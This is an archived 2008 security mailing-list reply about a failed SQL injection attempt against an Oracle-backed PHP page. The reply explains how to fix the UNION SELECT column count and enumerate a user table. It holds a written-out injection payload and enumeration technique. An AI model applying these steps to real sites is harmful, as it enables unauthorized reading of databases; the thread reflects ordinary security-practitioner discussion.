From: Todd Manning (tmanning@bpointsys.com)
Date: Mon Jan 21 2008 - 00:03:38 EST
On Jan 17, 2008, at 6:21 PM, Clone wrote:
> http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
>
> and I get the error
>
> ociexecute() [function.ociexecute]: OCIStmtExecute:
> ORA-01789: query block has incorrect number of result
> columns in dbs.inc on line 44
The hint is in the error. Your injected UNION must select the same
number of columns as the original query. Vary the number of columns
instead of doing a 'select *.' If you don't know the column names, you
can do something like 'select 1,2,3,4,5,6,7 from usr'. Since you say
you have a valid account on the db server, I guess you could go ahead
and find out the schema for the usr table.
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:20 EDT